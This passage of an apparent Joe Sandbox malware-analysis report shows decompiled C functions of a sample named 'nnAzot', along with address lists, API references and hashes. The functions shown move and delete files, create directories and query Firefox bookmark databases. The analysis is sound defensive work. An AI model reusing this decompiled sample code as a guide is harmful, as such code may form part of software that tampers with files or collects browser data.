            									_t107 = _v8;
            								} else {
            									_t180 = _t180 - 2;
            									_t122 = _v16 + 1;
            									_a4 = _t180;
            									_v16 = _t122;
            									_v12 = _t122;
            									_t107 = E003A3AA8(_t180, _t122, 0x3a1744);
            									_v8 = _t107;
            								}
            								goto L23;
            							}
            							_t26 = _t170 + 2; // 0x2
            							_t132 = _t26;
            							goto L22;
            						}
            					}
            					_t151 = _t170 - _t132;
            					goto L16;
            				}
            				_t134 = _v8;
            				goto L69;
            			}



















































            0x003a4092
            0x003a409b
            0x003a40a0
            0x003a40a5
            0x003a4362
            0x003a4362
            0x003a40ac
            0x003a40b4
            0x003a40b6
            0x003a40b9
            0x003a40c3
            0x003a40ed
            0x003a40f8
            0x003a4102
            0x003a412b
            0x003a4104
            0x003a4104
            0x003a4107
            0x003a4117
            0x003a411b
            0x003a4120
            0x003a4122
            0x003a4122
            0x003a4120
            0x003a4117
            0x003a40c5
            0x003a40c5
            0x003a40d7
            0x003a40dc
            0x003a40df
            0x003a40e2
            0x003a40e8
            0x003a40e8
            0x003a4137
            0x003a433e
            0x003a434a
            0x003a434f
            0x003a4357
            0x003a4359
            0x003a4359
            0x003a435c
            0x00000000
            0x003a435c
            0x003a413d
            0x003a413f
            0x003a4142
            0x003a4144
            0x003a4148
            0x00000000
            0x00000000
            0x003a4156
            0x003a4158
            0x003a415f
            0x003a4167
            0x003a416c
            0x003a416f
            0x003a416f
            0x003a4172
            0x003a4175
            0x003a417b
            0x003a417e
            0x003a417e
            0x003a4180
            0x003a4189
            0x003a4337
            0x00000000
            0x003a419b
            0x003a419e
            0x003a41fa
            0x003a428d
            0x003a4291
            0x003a4295
            0x003a4297
            0x003a4298
            0x003a4298
            0x003a4295
            0x003a429b
            0x003a42a1
            0x003a42ab
            0x003a42b0
            0x003a42b3
            0x003a42b5
            0x003a42be
            0x003a4317
            0x003a431a
            0x00000000
            0x003a42c5
            0x003a42c7
            0x003a42cb
            0x00000000
            0x00000000
            0x003a42cd
            0x003a42d4
            0x003a432b
            0x003a432b
            0x003a4330
            0x003a4332
            0x003a4368
            0x003a436a
            0x00000000
            0x00000000
            0x003a436e
            0x003a439b
            0x003a439b
            0x003a439f
            0x003a43a2
            0x003a43a2
            0x003a43a5
            0x003a43a8
            0x003a43b4
            0x003a43b9
            0x003a43d0
            0x003a43d0
            0x003a43d6
            0x003a43da
            0x003a43de
            0x003a43e1
            0x003a43e1
            0x003a43e7
            0x003a43ec
            0x003a43f6
            0x003a43fa
            0x003a43fa
            0x003a43fe
            0x00000000
            0x003a43fe
            0x003a4370
            0x003a4375
            0x003a4379
            0x00000000
            0x00000000
            0x003a437b
            0x003a437f
            0x003a4386
            0x00000000
            0x00000000
            0x003a438a
            0x003a438d
            0x003a4392
            0x00000000
            0x00000000
            0x00000000
            0x003a4394
            0x003a4398
            0x00000000
            0x003a4398
            0x003a42d8
            0x003a42dc
            0x003a42e6
            0x003a42e9
            0x003a42ef
            0x003a431d
            0x003a431d
            0x003a4320
            0x00000000
            0x003a42fc
            0x003a42fc
            0x003a42ff
            0x003a4303
            0x003a4306
            0x003a4309
            0x003a430c
            0x003a430f
            0x003a4312
            0x003a4323
            0x003a4323
            0x003a41b6
            0x003a41b8
            0x00000000
            0x00000000
            0x003a41be
            0x00000000
            0x003a41be
            0x00000000
            0x00000000
            0x00000000
            0x003a42dc
            0x003a42be
            0x003a4202
            0x003a4206
            0x00000000
            0x003a4216
            0x003a4218
            0x003a427c
            0x003a427c
            0x003a4281
            0x003a4271
            0x003a4271
            0x00000000
            0x003a4271
            0x003a4283
            0x003a4283
            0x00000000
            0x003a4283
            0x003a4223
            0x003a4279
            0x00000000
            0x003a4279
            0x003a4225
            0x003a422a
            0x003a423b
            0x003a423d
            0x003a423f
            0x003a423f
            0x003a4242
            0x003a4249
            0x003a4255
            0x003a4257
            0x003a424b
            0x003a4251
            0x003a4251
            0x003a425a
            0x003a425f
            0x003a4269
            0x003a426e
            0x00000000
            0x003a426e
            0x003a422e
            0x003a422f
            0x003a422f
            0x003a4235
            0x00000000
            0x00000000
            0x003a4239
            0x00000000
            0x00000000
            0x00000000
            0x003a4239
            0x00000000
            0x003a422f
            0x003a4206
            0x003a41a2
            0x003a41a6
            0x00000000
            0x00000000
            0x003a41ae
            0x003a41c2
            0x003a41c7
            0x003a41b3
            0x003a41b3
            0x003a41d4
            0x003a41d7
            0x003a41da
            0x003a41db
            0x003a41e5
            0x003a41ea
            0x003a41ed
            0x003a41f2
            0x003a41f2
            0x00000000
            0x003a41c7
            0x003a41b0
            0x003a41b0
            0x00000000
            0x003a41b0
            0x003a4189
            0x003a4163
            0x00000000
            0x003a4163
            0x003a4365
            0x00000000

            APIs
            • iswalpha.MSVCRT ref: 003A410E
            • wcschr.MSVCRT ref: 003A4150
              • Part of subcall function 003A3D00: iswalpha.MSVCRT ref: 003A3D26
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: iswalpha$wcschr
            • String ID: ::$DATA$\\?\
            • API String ID: 2247047535-2521888196
            • Opcode ID: f3c3800d142e3704466d4945a69c869360958c0a57ffc3aaf737a787f6a21bd8
            • Instruction ID: 0e70dbf5066aa6c4423b44647fcc8a3f7f83b272fa73cfb42de1d258fc45d16b
            • Opcode Fuzzy Hash: f3c3800d142e3704466d4945a69c869360958c0a57ffc3aaf737a787f6a21bd8
            • Instruction Fuzzy Hash: 84B1C635E00215DBCF26DF68C8816AEB7B5FF96310F25856AE945DB280E7B0DE80C790
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 384 3a35ee-3a3630 LoadStringW 385 3a3632-3a364e call 3a3407 384->385 386 3a3650-3a3655 384->386 388 3a365b-3a365d 385->388 386->388 390 3a375a-3a376c call 3a4aad 388->390 391 3a3663 388->391 393 3a3668-3a367d call 3a3472 391->393 397 3a367f-3a3691 393->397 398 3a3697-3a36ad LoadStringW 397->398 399 3a36af-3a36c3 call 3a3407 398->399 400 3a36c5 398->400 402 3a36ca-3a36cc 399->402 400->402 404 3a36ee 402->404 405 3a36ce-3a36e3 PathFileExistsW 402->405 406 3a36f4-3a36fb 404->406 405->406 407 3a36e5-3a36ec 405->407 406->398 408 3a36fd-3a370b 406->408 407->406 408->390 409 3a370d-3a371c PathFileExistsW 408->409 410 3a371e-3a372e CreateDirectoryW 409->410 411 3a3730 409->411 410->390 410->411 412 3a3736-3a3752 call 3a3528 411->412 415 3a3754 412->415 415->390
            C-Code - Quality: 96%
            			E003A35EE(struct HINSTANCE__* __ecx, int __edx) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				short _v1568;
            				signed int _v1572;
            				intOrPtr _v1576;
            				WCHAR* _v1580;
            				struct HINSTANCE__* _v1584;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t38;
            				signed int _t39;
            				struct _SECURITY_ATTRIBUTES* _t41;
            				int _t47;
            				intOrPtr _t50;
            				struct HINSTANCE__* _t51;
            				int _t52;
            				intOrPtr _t61;
            				struct HINSTANCE__* _t62;
            				struct HINSTANCE__* _t63;
            				int _t64;
            				void* _t65;
            				intOrPtr _t66;
            				signed int _t67;
            
            				_t60 = __edx;
            				_v8 =  *0x3a6004 ^ _t67;
            				_t51 = __ecx;
            				_t64 = __edx;
            				_v1584 = __ecx;
            				_v1580 = __edx;
            				if(LoadStringW(__ecx, 0x5601,  &_v1048, 0x104) == 0) {
            					_t61 = 0x80004005;
            					_v1576 = 0x80004005;
            				} else {
            					_t60 =  &_v528;
            					_t50 = E003A3407(_t51, _t64,  &_v528,  &_v1048);
            					_t61 = _t50;
            					_v1576 = _t50;
            				}
            				if(_t61 < 0) {
            					L21:
            					return E003A4AAD(_t61, _t51, _v8 ^ _t67, _t60, _t61, _t64);
            				} else {
            					_t65 = 0x5610;
            					do {
            						_t60 = _v1580;
            						E003A3472(_t51, _v1580, _t61, _t65);
            						_t65 = _t65 + 1;
            					} while (_t65 <= 0x5613);
            					_v1572 = _v1572 & 0x00000000;
            					_t52 = 0x5630;
            					_t62 = _v1584;
            					_t66 = _v1580;
            					do {
            						if(LoadStringW(_t62, _t52,  &_v1048, 0x104) == 0) {
            							_t38 = 0x80004005;
            						} else {
            							_t60 =  &_v1568;
            							_t38 = E003A3407(_t52, _t66,  &_v1568,  &_v1048);
            						}
            						if(_t38 < 0) {
            							_t39 = _v1572;
            						} else {
            							_t47 = PathFileExistsW( &_v1568);
            							_t39 = _v1572;
            							if(_t47 != 0) {
            								_t39 = _t39 + 1;
            								_v1572 = _t39;
            							}
            						}
            						_t52 = _t52 + 1;
            					} while (_t52 <= 0x5631);
            					_t61 = _v1576;
            					_t64 = 0x5630;
            					if(_t39 < 2) {
            						goto L21;
            					}
            					_t41 = PathFileExistsW( &_v528);
            					if(_t41 != 0 || CreateDirectoryW( &_v528, _t41) != 0) {
            						_t63 = _v1584;
            						do {
            							_t60 = _v1580;
            							E003A3528(_t63, _v1580, _t63,  &_v528, _t64);
            							_t64 = _t64 + 1;
            						} while (_t64 <= 0x5631);
            						_t61 = _v1576;
            					}
            					goto L21;
            				}
            			}




























            0x003a35ee
            0x003a3600
            0x003a3611
            0x003a3619
            0x003a361b
            0x003a3622
            0x003a3630
            0x003a3650
            0x003a3655
            0x003a3632
            0x003a363b
            0x003a3641
            0x003a3646
            0x003a3648
            0x003a3648
            0x003a365d
            0x003a375a
            0x003a376c
            0x003a3663
            0x003a3663
            0x003a3668
            0x003a3668
            0x003a3671
            0x003a3676
            0x003a3677
            0x003a367f
            0x003a3686
            0x003a368b
            0x003a3691
            0x003a3697
            0x003a36ad
            0x003a36c5
            0x003a36af
            0x003a36b8
            0x003a36be
            0x003a36be
            0x003a36cc
            0x003a36ee
            0x003a36ce
            0x003a36d5
            0x003a36dd
            0x003a36e3
            0x003a36e5
            0x003a36e6
            0x003a36e6
            0x003a36e3
            0x003a36f4
            0x003a36f5
            0x003a36fd
            0x003a3703
            0x003a370b
            0x00000000
            0x00000000
            0x003a3714
            0x003a371c
            0x003a3730
            0x003a3736
            0x003a3736
            0x003a3746
            0x003a374b
            0x003a374c
            0x003a3754
            0x003a3754
            0x00000000
            0x003a371c

            APIs
            • LoadStringW.USER32(?,00005601,?,00000104), ref: 003A3628
            • LoadStringW.USER32(?,00005630,?,00000104), ref: 003A36A5
            • PathFileExistsW.SHLWAPI(?), ref: 003A36D5
            • PathFileExistsW.SHLWAPI(?), ref: 003A3714
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3726
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExistsFileLoadPathString$CreateDirectory
            • String ID:
            • API String ID: 2019810426-0
            • Opcode ID: 80555ae0df5ebe5edd3020badd95fbc20137401722b1d37aaa667af1687ef087
            • Instruction ID: a34be8ca14a82a92b5dc81ec1303f18b98bd758c954cffe2761e574056f3ff05
            • Opcode Fuzzy Hash: 80555ae0df5ebe5edd3020badd95fbc20137401722b1d37aaa667af1687ef087
            • Instruction Fuzzy Hash: DE4196B1E00528ABDB22DF21CC84ADEB7BEEB89310F1541E5E509E7250D7329F558F54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 424 3a3ee7-3a3efa 425 3a3fed 424->425 426 3a3f00-3a3f05 424->426 427 3a3ff2-3a3ff8 425->427 426->425 428 3a3f0b-3a3f0d 426->428 428->425 429 3a3f13-3a3f24 call 3a3ca0 428->429 432 3a3f93-3a3f96 429->432 433 3a3f26-3a3f37 wcschr 429->433 434 3a3f98-3a3f9c 432->434 435 3a3f9e-3a3fa7 call 3a476c 432->435 436 3a3f78-3a3f7c 433->436 437 3a3f39-3a3f4d wcschr 433->437 434->435 439 3a3fe1 434->439 449 3a3fa9-3a3fac 435->449 450 3a3fae-3a3fbe call 3a46c3 435->450 438 3a3f7f-3a3f88 436->438 441 3a3f4f-3a3f52 437->441 442 3a3f5d-3a3f61 437->442 438->438 446 3a3f8a-3a3f91 438->446 444 3a3fe4-3a3feb 439->444 443 3a3f58 441->443 441->444 445 3a3f64-3a3f6d 442->445 443->439 444->427 445->445 448 3a3f6f-3a3f76 445->448 446->444 448->444 451 3a3fdc-3a3fdf 449->451 454 3a3fc3-3a3fd0 iswalpha 450->454 455 3a3fc0 450->455 451->439 451->444 454->425 456 3a3fd2-3a3fd7 454->456 455->454 456->425 457 3a3fd9 456->457 457->451
            C-Code - Quality: 96%
            			E003A3EE7(signed short** __edx) {
            				wchar_t* _v8;
            				signed short** _v12;
            				void* __ecx;
            				void* _t17;
            				void* _t18;
            				signed short* _t19;
            				signed short* _t20;
            				int _t22;
            				signed short* _t25;
            				wchar_t* _t26;
            				signed short* _t28;
            				intOrPtr* _t31;
            				signed short* _t32;
            				wchar_t* _t40;
            				intOrPtr* _t45;
            				long* _t51;
            				void* _t52;
            				long _t55;
            				signed short* _t59;
            				wchar_t* _t61;
            
            				_push(_t32);
            				_push(_t32);
            				_t59 = _t32;
            				_v12 = __edx;
            				if(_t59 == 0 ||  *_t59 == 0 || __edx == 0) {
            					L26:
            					_t17 = 0x80070057;
            				} else {
            					 *__edx = 0;
            					_t18 = E003A3CA0(_t59,  &_v8);
            					_t55 = 0x5c;
            					if(_t18 == 0) {
            						__eflags =  *_t59 - _t55;
            						if(__eflags != 0) {
            							L16:
            							_t19 = E003A476C(_t59, __eflags);
            							__eflags = _t19;
            							if(_t19 == 0) {
            								_t20 = E003A46C3(_t59, L"\\\\?\\", 4);
            								__eflags = _t20;
            								if(_t20 != 0) {
            									_t59 =  &(_t59[4]);
            									__eflags = _t59;
            								}
            								_t22 = iswalpha( *_t59 & 0x0000ffff);
            								__eflags = _t22;
            								if(_t22 == 0) {
            									goto L26;
            								} else {
            									__eflags = _t59[1] - 0x3a;
            									if(_t59[1] != 0x3a) {
            										goto L26;
            									} else {
            										_t59 =  &(_t59[2]);
            										__eflags = _t59;
            										goto L23;
            									}
            								}
            							} else {
            								_t59 =  &(_t59[0x30]);
            								L23:
            								__eflags =  *_t59 - _t55;
            								if( *_t59 == _t55) {
            									goto L24;
            								}
            								goto L25;
            							}
            						} else {
            							__eflags = _t59[1] - _t55;
            							if(__eflags != 0) {
            								goto L24;
            							} else {
            								goto L16;
            							}
            						}
            					} else {
            						_t61 = _v8;
            						_t31 = wcschr(_t61, _t55);
            						if(_t31 == 0) {
            							_t40 = _t61;
            							__eflags = 0;
            							_t51 =  &(_t40[0]);
            							do {
            								_t25 =  *_t40;
            								_t40 =  &(_t40[0]);
            								__eflags = _t25;
            							} while (_t25 != 0);
            							_t59 = _t61 + (_t40 - _t51 >> 1) * 2;
            						} else {
            							_t4 = _t31 + 2; // 0x2
            							_t26 = _t4;
            							_v8 = _t26;
            							_t59 = wcschr(_t26, _t55);
            							if(_t59 == 0) {
            								_t45 = _t31;
            								__eflags = 0;
            								_t7 = _t45 + 2; // 0x2
            								_t52 = _t7;
            								do {
            									_t28 =  *_t45;
            									_t45 = _t45 + 2;
            									__eflags = _t28;
            								} while (_t28 != 0);
            								_t59 = _t31 + (_t45 - _t52 >> 1) * 2;
            							} else {
            								if(_t59 != _v8) {
            									L24:
            									_t59 =  &(_t59[1]);
            								}
            							}
            						}
            						L25:
            						 *_v12 = _t59;
            						_t17 = 0;
            					}
            				}
            				return _t17;
            			}























            0x003a3eec
            0x003a3eed
            0x003a3ef0
            0x003a3ef4
            0x003a3efa
            0x003a3fed
            0x003a3fed
            0x003a3f13
            0x003a3f13
            0x003a3f1a
            0x003a3f21
            0x003a3f24
            0x003a3f93
            0x003a3f96
            0x003a3f9e
            0x003a3fa0
            0x003a3fa5
            0x003a3fa7
            0x003a3fb7
            0x003a3fbc
            0x003a3fbe
            0x003a3fc0
            0x003a3fc0
            0x003a3fc0
            0x003a3fc7
            0x003a3fce
            0x003a3fd0
            0x00000000
            0x003a3fd2
            0x003a3fd2
            0x003a3fd7
            0x00000000
            0x003a3fd9
            0x003a3fd9
            0x003a3fd9
            0x00000000
            0x003a3fd9
            0x003a3fd7
            0x003a3fa9
            0x003a3fa9
            0x003a3fdc
            0x003a3fdc
            0x003a3fdf
            0x00000000
            0x00000000
            0x00000000
            0x003a3fdf
            0x003a3f98
            0x003a3f98
            0x003a3f9c
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x003a3f9c
            0x003a3f26
            0x003a3f26
            0x003a3f31
            0x003a3f37
            0x003a3f78
            0x003a3f7a
            0x003a3f7c
            0x003a3f7f
            0x003a3f7f
            0x003a3f82
            0x003a3f85
            0x003a3f85
            0x003a3f8e
            0x003a3f39
            0x003a3f39
            0x003a3f39
            0x003a3f3e
            0x003a3f47
            0x003a3f4d
            0x003a3f5d
            0x003a3f5f
            0x003a3f61
            0x003a3f61
            0x003a3f64
            0x003a3f64
            0x003a3f67
            0x003a3f6a
            0x003a3f6a
            0x003a3f73
            0x003a3f4f
            0x003a3f52
            0x003a3fe1
            0x003a3fe1
            0x003a3fe1
            0x003a3f52
            0x003a3f4d
            0x003a3fe4
            0x003a3fe7
            0x003a3fe9
            0x003a3fe9
            0x003a3f24
            0x003a3ff8

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: wcschr
            • String ID: \\?\
            • API String ID: 1497570035-4282027825
            • Opcode ID: 6fc51a6ddcb298f881916c5fb3863286509c3071f3b6a74545fb7b5ac2938cf9
            • Instruction ID: b8115e837705adbdded44177f26dfd2fb0380d720b61e7d16aeb95f17ddbbb62
            • Opcode Fuzzy Hash: 6fc51a6ddcb298f881916c5fb3863286509c3071f3b6a74545fb7b5ac2938cf9
            • Instruction Fuzzy Hash: B131F736E112119FDF369B14880597BB3B4DB83750727405EFD469BA80E7629F41C690
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 458 3a2a22-3a2a4b call 3a295f 461 3a2a51-3a2a8e call 3a2225 call 3a2b5d 458->461 462 3a2b44-3a2b55 call 3a4aad 458->462 469 3a2b39-3a2b3f call 3a27b8 461->469 470 3a2a94-3a2aa6 call 3a259e 461->470 469->462 470->469 474 3a2aac-3a2abd 470->474 474->469 476 3a2abf-3a2ad1 474->476 478 3a2ad4-3a2adc 476->478 478->478 479 3a2ade-3a2b00 ??2@YAPAXI@Z 478->479 479->469 480 3a2b02-3a2b22 call 3a25db 479->480 484 3a2b31-3a2b38 ??3@YAXPAX@Z 480->484 485 3a2b24-3a2b2f 480->485 484->469 485->469
            C-Code - Quality: 36%
            			E003A2A22(void* __ecx, void* __edi, intOrPtr _a4, signed int* _a8) {
            				signed int _v8;
            				char _v2060;
            				char _v2064;
            				char _v2068;
            				signed int* _v2072;
            				signed int _v2076;
            				void* __ebx;
            				void* __esi;
            				intOrPtr* _t40;
            				signed int _t43;
            				signed int _t44;
            				void* _t45;
            				void* _t46;
            				signed int _t48;
            				signed int _t49;
            				void* _t50;
            				intOrPtr _t59;
            				void* _t70;
            				void* _t71;
            				char _t72;
            				signed int _t74;
            				intOrPtr _t81;
            
            				_t71 = __edi;
            				_t50 = __ecx;
            				_v8 =  *0x3a6004 ^ _t74;
            				_v2072 = _a8;
            				_t72 = 0;
            				if(E003A295F() == 0) {
            					L11:
            					return E003A4AAD(_t72, _t48, _v8 ^ _t74, _t69, _t71, _t72);
            				}
            				_v2068 = 0;
            				_v2064 = 0;
            				E003A2225( &_v2060, 0x400, L"select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes as a on b.id=ai.item_id and a.id=ai.anno_attribute_id where a.name=\'livemark/feedURI\' and b.id=%d", _a4);
            				if(E003A2B5D(_t50,  &_v2060,  &_v2068) < 0 || E003A259E(0x3a6448, _v2068) < 0) {
            					L10:
            					E003A27B8( &_v2068, _t83);
            					goto L11;
            				} else {
            					_push(0);
            					_push(_v2068);
            					if( *0x3a64c4() > 0) {
            						_t49 = 2;
            						_t40 =  *0x3a64e8(_v2068, _t49);
            						_t13 = _t40 + 2; // 0x2
            						_t70 = _t13;
            						do {
            							_t59 =  *_t40;
            							_t40 = _t40 + _t49;
            							_t81 = _t59;
            						} while (_t81 != 0);
            						_t43 = (_t40 - _t70 >> 1) + 1;
            						_v2076 = _t43;
            						_t69 = _t43 * _t49 >> 0x20;
            						_t44 = _t43 * _t49;
            						__imp__??2@YAPAXI@Z( ~(0 | _t81 > 0x00000000) | _t44);
            						_t48 = _t44;
            						if(_t48 != 0) {
            							_t45 =  *0x3a64e8(_v2068, 2);
            							_t69 = _v2076;
            							_t46 = E003A25DB(_t48, _v2076, _t45);
            							_t83 = _t46;
            							if(_t46 < 0) {
            								__imp__??3@YAXPAX@Z(_t48);
            							} else {
            								_t72 = 1;
            								 *_v2072 = _t48;
            							}
            						}
            					}
            					goto L10;
            				}
            			}

























            0x003a2a22
            0x003a2a22
            0x003a2a34
            0x003a2a3c
            0x003a2a42
            0x003a2a4b
            0x003a2b44
            0x003a2b55
            0x003a2b55
            0x003a2a5a
            0x003a2a6b
            0x003a2a71
            0x003a2a8e
            0x003a2b39
            0x003a2b3f
            0x00000000
            0x003a2aac
            0x003a2aac
            0x003a2aad
            0x003a2abd
            0x003a2ac1
            0x003a2ac9
            0x003a2ad1
            0x003a2ad1
            0x003a2ad4
            0x003a2ad4
            0x003a2ad7
            0x003a2ad9
            0x003a2ad9
            0x003a2ae4
            0x003a2ae5
            0x003a2aeb
            0x003a2aeb
            0x003a2af5
            0x003a2afb
            0x003a2b00
            0x003a2b0a
            0x003a2b10
            0x003a2b1b
            0x003a2b20
            0x003a2b22
            0x003a2b32
            0x003a2b24
            0x003a2b2c
            0x003a2b2d
            0x003a2b2d
            0x003a2b22
            0x003a2b00
            0x00000000
            0x003a2abd

            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • ??2@YAPAXI@Z.MSVCRT ref: 003A2AF5
            • ??3@YAXPAX@Z.MSVCRT ref: 003A2B32
            Strings
            • select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes, xrefs: 003A2A60
            • Hd:, xrefs: 003A2A9A
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ??2@??3@_vsnwprintf
            • String ID: Hd:$select count(*), b.title,ai.content,a.name from moz_bookmarks as b inner join moz_items_annos as ai inner join moz_anno_attributes
            • API String ID: 1401084937-4012710142
            • Opcode ID: 66cf2668f384c4416a99131a034821a8cfe6def194416e3f6f9d173da0bc907d
            • Instruction ID: 04fd369dfc5c8547f110ebdae05d61f26e9c1ffb4d719811dc8c3900440762dd
            • Opcode Fuzzy Hash: 66cf2668f384c4416a99131a034821a8cfe6def194416e3f6f9d173da0bc907d
            • Instruction Fuzzy Hash: 1431A4316002199FDB26AF28DD46EDB77ECFF06310F0085AAE945D6191DE709E858FE0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 486 3a3528-3a355b LoadStringW 487 3a355d-3a3575 LoadStringW 486->487 488 3a35d7-3a35e6 call 3a4aad 486->488 490 3a358d 487->490 491 3a3577-3a358b call 3a3407 487->491 494 3a3592-3a3594 490->494 491->494 494->488 496 3a3596-3a35ab call 3a25db 494->496 496->488 499 3a35ad-3a35c1 call 3a4672 496->499 499->488 502 3a35c3-3a35d1 MoveFileW 499->502 502->488
            C-Code - Quality: 95%
            			E003A3528(struct HINSTANCE__* __ecx, int __edx, void* __edi, intOrPtr _a4, int _a8) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				short _v1568;
            				void* __ebx;
            				void* __esi;
            				int _t26;
            				void* _t34;
            				struct HINSTANCE__* _t35;
            				signed int _t36;
            
            				_t34 = __edi;
            				_t33 = __edx;
            				_v8 =  *0x3a6004 ^ _t36;
            				_t35 = __ecx;
            				_t3 =  &_a8; // 0x3a374b
            				_t26 = __edx;
            				if(LoadStringW(__ecx,  *_t3,  &_v1048, 0x104) != 0) {
            					if(LoadStringW(_t35, _a8,  &_v528, 0x104) == 0) {
            						_t18 = 0x80004005;
            					} else {
            						_t33 =  &_v1568;
            						_t18 = E003A3407(_t26, _t26,  &_v1568,  &_v528);
            					}
            					if(_t18 >= 0) {
            						_t33 = 0x104;
            						if(E003A25DB( &_v528, 0x104, _a4) >= 0 && E003A4672( &_v528,  &_v1048) >= 0) {
            							_t18 = MoveFileW( &_v1568,  &_v528);
            						}
            					}
            				}
            				return E003A4AAD(_t18, _t26, _v8 ^ _t36, _t33, _t34, _t35);
            			}













            0x003a3528
            0x003a3528
            0x003a353a
            0x003a354a
            0x003a354d
            0x003a3550
            0x003a355b
            0x003a3575
            0x003a358d
            0x003a3577
            0x003a3580
            0x003a3586
            0x003a3586
            0x003a3594
            0x003a3599
            0x003a35ab
            0x003a35d1
            0x003a35d1
            0x003a35ab
            0x003a3594
            0x003a35e6

            APIs
            • LoadStringW.USER32(?,K7:,?,00000104), ref: 003A3553
            • LoadStringW.USER32(?,?,?,00000104), ref: 003A356D
            • MoveFileW.KERNEL32 ref: 003A35D1
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: LoadString$FileMove
            • String ID: K7:
            • API String ID: 600763028-3582313141
            • Opcode ID: 6c79f4e31cc790f393906a9e344fbfa6323853d7c0a97ff17d1b41e948475e1e
            • Instruction ID: 4acbb6cc4d94874b5155ddb8efcf2df4e309c1a9d7396e5573a9805f422e2dd2
            • Opcode Fuzzy Hash: 6c79f4e31cc790f393906a9e344fbfa6323853d7c0a97ff17d1b41e948475e1e
            • Instruction Fuzzy Hash: B01182B1A0021CABDB12DF24DC84AFE77BDEB46350F1082A6BA15D6151DB30DF48CE64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E003A3472(struct HINSTANCE__* __ecx, short* __edx, void* __edi, int _a4) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				void* __esi;
            				void* _t21;
            				WCHAR* _t25;
            				int _t27;
            				void* _t30;
            				WCHAR* _t31;
            				signed int _t32;
            
            				_t30 = __edi;
            				_t29 = __edx;
            				_v8 =  *0x3a6004 ^ _t32;
            				_t31 = __edx;
            				if(LoadStringW(__ecx, _a4,  &_v1048, 0x104) == 0) {
            					_t15 = 0x80004005;
            				} else {
            					_t29 =  &_v528;
            					_t15 = E003A3407(_t21, _t31,  &_v528,  &_v1048);
            				}
            				if(_t15 < 0) {
            					L10:
            					return E003A4AAD(_t15, _t21, _v8 ^ _t32, _t29, _t30, _t31);
            				} else {
            					_t25 = _t31;
            					_t29 =  &(_t25[1]);
            					do {
            						_t15 =  *_t25;
            						_t25 =  &(_t25[1]);
            					} while (_t15 != 0);
            					_t27 = _t25 - _t29 >> 1;
            					if(_t27 > 3 && StrCmpNW(_t31,  &_v528, _t27) == 0 && StrStrW( &_v528, L"..") == 0) {
            						_t15 = DeleteFileW( &_v528);
            					}
            					goto L10;
            				}
            			}













            0x003a3472
            0x003a3472
            0x003a3484
            0x003a3493
            0x003a34a2
            0x003a34ba
            0x003a34a4
            0x003a34ad
            0x003a34b3
            0x003a34b3
            0x003a34c1
            0x003a3512
            0x003a3520
            0x003a34c3
            0x003a34c3
            0x003a34c5
            0x003a34c8
            0x003a34c8
            0x003a34cb
            0x003a34ce
            0x003a34d5
            0x003a34da
            0x003a350c
            0x003a350c
            0x00000000
            0x003a34da

            APIs
            • LoadStringW.USER32(?,003A3676,?,00000104), ref: 003A349A
            • StrCmpNW.SHLWAPI(?,?,?), ref: 003A34E5
            • StrStrW.SHLWAPI(?,003A1ACC), ref: 003A34FB
            • DeleteFileW.KERNEL32(?), ref: 003A350C
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
